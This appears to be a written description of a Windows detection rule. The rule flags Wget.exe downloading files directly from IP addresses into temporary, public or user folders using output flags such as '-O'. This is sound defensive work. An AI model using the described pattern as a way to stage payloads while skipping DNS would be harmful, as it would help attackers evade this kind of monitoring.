This detection rule monitors for potentially malicious file downloads executed through Wget.exe from direct IP addresses, which may signify automated attacks or data exfiltration attempts. The rule focuses on specific command-line patterns associated with Wget, particularly looking for flags that specify output locations. It inspects the command line for patterns that indicate downloads are being directed to common temporary or public folders, which may be utilized by attackers to store files maliciously. The presence of command-line parameters such as '-O' or '--output-document' indicates specificity in file download management, further highlighting the suspicious nature of the activity. By analyzing process creation logs within Windows environments, this rule aims to catch instances where files are being downloaded from an IP address directly, potentially avoiding DNS resolution that is often used to camouflage malicious behavior. The primary file paths under scrutiny include those that are generally not safe for storing downloaded content, such as 'C:\Temp\', 'C:\Users\Public\', and other user directory subfolders like Pictures or Documents to indicate more personal or sensitive areas. Overall, the rule provides a critical layer of defense against suspicious download behavior that may lead to exploitation.